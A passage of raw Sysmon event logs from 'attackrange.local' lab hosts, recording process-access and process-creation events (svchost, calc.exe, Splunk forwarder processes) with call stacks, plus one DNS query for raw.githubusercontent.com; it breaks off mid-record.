22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361363Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361362Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361361Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361360Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361359Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37cee|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361358Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a44-6013-1100-000000001100}11165232C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361357Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.007{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3707-6013-b303-000000001100}8576C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000032976Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:29.506{FF16AF91-3709-6013-8003-00000000A401}69606312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032975Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:29.366{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-3709-6013-8003-00000000A401}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032974Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032973Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032972Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032971Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032970Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:29.366{FF16AF91-26B4-6013-0500-00000000A401}644760C:\Windows\system32\csrss.exe{FF16AF91-3709-6013-8003-00000000A401}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032969Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:29.366{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-3709-6013-8003-00000000A401}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032968Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:29.366{FF16AF91-3709-6013-8003-00000000A401}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362389Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:30.648{8e433fbf-370a-6013-bc03-000000001100}93045416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362388Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:30.445{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-370a-6013-bc03-000000001100}9304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362387Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:30.445{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362386Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:30.445{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362385Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:30.445{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362384Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:30.445{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362383Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:30.445{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-370a-6013-bc03-000000001100}9304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362382Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:30.445{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-370a-6013-bc03-000000001100}9304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362381Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:30.305{8e433fbf-370a-6013-bc03-000000001100}9304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x8000000000000000362380Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:27.966{00000000-0000-0000-0000-000000000000}10452raw.githubusercontent.com0type: 5 github.map.fastly.net;::ffff:151.101.52.133;<unknown process> 10341000x800000000000000032984Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:30.038{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-370A-6013-8103-00000000A401}4224C:\Program 